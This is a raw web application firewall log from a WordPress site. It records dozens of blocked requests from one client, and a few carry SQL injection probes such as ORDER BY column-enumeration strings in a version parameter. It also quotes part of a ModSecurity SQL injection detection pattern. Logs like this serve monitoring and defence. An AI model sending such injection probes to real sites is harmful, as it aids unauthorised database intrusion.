[:error] [pid 31245:tid 140055416026880] [client 141.98.81.52:34402] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFp657xDCgKzJ-zxAxmwAAAEU"] [Wed Jun 26 16:18:31.565374 2024] [:error] [pid 31245:tid 140055276394240] [client 141.98.81.52:34404] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFp657xDCgKzJ-zxAxnAAAAE0"] [Wed Jun 26 16:18:31.818011 2024] [:error] [pid 31245:tid 140055441204992] [client 141.98.81.52:34406] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFp657xDCgKzJ-zxAxnQAAAEI"] [Wed Jun 26 16:18:32.072935 2024] [:error] [pid 31859:tid 140055184074496] [client 141.98.81.52:34408] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqIxkekPtrPbqLNY4awAAANg"] [Wed Jun 26 16:18:32.981178 2024] [:error] [pid 31859:tid 140055217645312] [client 141.98.81.52:34410] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqIxkekPtrPbqLNY4bAAAANQ"] [Wed Jun 26 16:18:33.223461 2024] [:error] [pid 31859:tid 140055251216128] [client 141.98.81.52:34412] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqYxkekPtrPbqLNY4bQAAANA"] [Wed Jun 26 16:18:33.474058 2024] [:error] [pid 31859:tid 140055209252608] [client 141.98.81.52:34414] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqYxkekPtrPbqLNY4bgAAANU"] [Wed Jun 26 16:18:33.711437 2024] [:error] [pid 31859:tid 140055309965056] [client 141.98.81.52:34416] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqYxkekPtrPbqLNY4bwAAAMk"] [Wed Jun 26 16:18:33.946483 2024] [:error] [pid 31859:tid 140055318357760] [client 141.98.81.52:34418] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqYxkekPtrPbqLNY4cAAAAMg"] [Wed Jun 26 16:18:34.187545 2024] [:error] [pid 31244:tid 140055318357760] [client 141.98.81.52:34420] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqubXXCyFmkhe1iNqTwAAAAg"] [Wed Jun 26 16:18:34.657127 2024] [:error] [pid 31859:tid 140055259608832] [client 141.98.81.52:34422] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqoxkekPtrPbqLNY4cQAAAM8"] [Wed Jun 26 16:18:34.911592 2024] [:error] [pid 31244:tid 140055276394240] [client 141.98.81.52:34424] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFqubXXCyFmkhe1iNqUAAAAA0"] [Wed Jun 26 16:18:35.150186 2024] [:error] [pid 31859:tid 140055449597696] [client 141.98.81.52:34426] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFq4xkekPtrPbqLNY4cgAAAME"] [Wed Jun 26 16:18:35.400040 2024] [:error] [pid 31859:tid 140055416026880] [client 141.98.81.52:34428] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFq4xkekPtrPbqLNY4cwAAAMU"] [Wed Jun 26 16:18:35.649620 2024] [:error] [pid 31859:tid 140055293179648] [client 141.98.81.52:34430] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFq4xkekPtrPbqLNY4dAAAAMs"] [Wed Jun 26 16:18:35.893550 2024] [:error] [pid 31859:tid 140055200859904] [client 141.98.81.52:34432] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFq4xkekPtrPbqLNY4dQAAANY"] [Wed Jun 26 16:18:36.138433 2024] [:error] [pid 31245:tid 140055293179648] [client 141.98.81.52:34434] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrK57xDCgKzJ-zxAxngAAAEs"] [Wed Jun 26 16:18:36.384653 2024] [:error] [pid 31245:tid 140055424419584] [client 141.98.81.52:34436] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrK57xDCgKzJ-zxAxnwAAAEQ"] [Wed Jun 26 16:18:36.629148 2024] [:error] [pid 31245:tid 140055284786944] [client 141.98.81.52:34438] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrK57xDCgKzJ-zxAxoAAAAEw"] [Wed Jun 26 16:18:36.884134 2024] [:error] [pid 31245:tid 140055309965056] [client 141.98.81.52:34440] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrK57xDCgKzJ-zxAxoQAAAEk"] [Wed Jun 26 16:18:37.131566 2024] [:error] [pid 31859:tid 140055424419584] [client 141.98.81.52:34442] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrYxkekPtrPbqLNY4dgAAAMQ"] [Wed Jun 26 16:18:37.377868 2024] [:error] [pid 31245:tid 140055268001536] [client 141.98.81.52:34444] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFra57xDCgKzJ-zxAxogAAAE4"] [Wed Jun 26 16:18:37.632528 2024] [:error] [pid 31245:tid 140055301572352] [client 141.98.81.52:34446] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFra57xDCgKzJ-zxAxowAAAEo"] [Wed Jun 26 16:18:37.867540 2024] [:error] [pid 31245:tid 140055200859904] [client 141.98.81.52:34448] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFra57xDCgKzJ-zxAxpAAAAFY"] [Wed Jun 26 16:18:38.107924 2024] [:error] [pid 31245:tid 140055184074496] [client 141.98.81.52:34450] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrq57xDCgKzJ-zxAxpQAAAFg"] [Wed Jun 26 16:18:38.353511 2024] [:error] [pid 31245:tid 140055251216128] [client 141.98.81.52:34452] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFrq57xDCgKzJ-zxAxpgAAAFA"] [Wed Jun 26 16:18:38.601257 2024] [:error] [pid 31859:tid 140055242823424] [client 141.98.81.52:34454] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFroxkekPtrPbqLNY4dwAAANE"] [Wed Jun 26 16:18:40.006691 2024] [:error] [pid 31244:tid 140055226038016] [client 141.98.81.52:34456] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsObXXCyFmkhe1iNqUQAAABM"] [Wed Jun 26 16:18:40.251630 2024] [:error] [pid 31859:tid 140055457990400] [client 141.98.81.52:34460] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFsIxkekPtrPbqLNY4eAAAAMA"] [Wed Jun 26 16:18:40.734216 2024] [:error] [pid 31859:tid 140055276394240] [client 141.98.81.52:34462] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 